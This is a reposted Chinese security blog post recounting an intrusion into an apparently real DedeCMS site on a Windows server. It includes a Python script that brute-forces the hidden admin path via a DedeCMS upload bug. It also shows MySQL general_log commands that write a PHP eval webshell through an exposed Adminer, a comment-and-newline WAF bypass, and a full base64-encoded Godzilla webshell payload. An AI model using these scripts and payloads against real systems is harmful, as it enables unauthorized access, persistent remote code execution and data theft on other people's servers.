记一次偶遇Adminer

  • A+
所属分类:安全文章
记一次偶遇Adminer
亲爱的,关注我吧
记一次偶遇Adminer

9/28

文章共计1098个词

预计阅读7分钟

来和我一起阅读吧



作者:Bughunter

转载自先知社区:https://xz.aliyun.com/t/8309


又是无聊的一天打开高危扫描器开扫,结果啥也没扫出来,然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms,服务器windows

记一次偶遇Adminer

各种历史洞打了一遍都没用,因为是windows可以用这个跑下后台

import requestsimport itertoolscharacters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"back_dir = ""flag = 0url = "http://www.test.com/tags.php"data = {    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",    "_FILES[mochazz][name]" : 0,    "_FILES[mochazz][size]" : 0,    "_FILES[mochazz][type]" : "image/gif"}
for num in range(1,7): if flag: break for pre in itertools.permutations(characters,num): pre = ''.join(list(pre)) data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) print("testing",pre) r = requests.post(url,data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("[+] 前缀为:",back_dir)flag = 0for i in range(30): if flag: break for ch in characters: if ch == characters[-1]: flag = 1 break data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch) r = requests.post(url, data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch print("[+] ",back_dir) data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("后台地址为:",back_dir)


结果跑完居然是dede,这就扯了我访问dede是404.

记一次偶遇Adminer

如果找到后台的话还可以用这个洞猜一下管理员账号:

http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/


山穷水尽了随手试了一下adminer.php居然存在(扫描器里有adminer.php的估计扫的目录太多了被封ip了所以不要相信扫描器)

记一次偶遇Adminer

然后就是又开始读文件了,先随意读一下,让它报出web路径来

记一次偶遇Adminer

记一次偶遇Adminer

因为是dedecms所以直接读 datacommon.inc.php

记一次偶遇Adminer

文件不存在?直接放F盘下读一下

记一次偶遇Adminer

发现账号为root,直接登录adminer.php通过日志getshell

记一次偶遇Adminer

set global general_log=on 开启general log模式set global general_log_file='F:\*****\shell.php';设置日志路径select '<?php eval($_POST['pwd']);?>'; 写shell毫无疑问最后这里被拦了,抓个包来测吧,select '<?php '不拦

记一次偶遇Adminer

select+'<?php+phpinfo();+?>'拦掉

记一次偶遇Adminer

使用注释换行绕过select+'<?php+//%0Aphpinfo();+?>'

记一次偶遇Adminer

写个哥斯拉的马

select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>'

记一次偶遇Adminer

成功连上,system

记一次偶遇Adminer



相关实验

Dedecms任意密码重置

https://www.hetianlab.com/expc.do?ec=ECIDe907-9309-4de6-8b4d-b941b34caa1c

9/28


欢迎投稿至qq:3200599554

有才能的你快来投稿吧!

投稿细则都在里面了,点击查看哦

重金悬赏 | 合天原创投稿涨稿费啦!


记一次偶遇Adminer
“阅读原文”我们一起进步

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: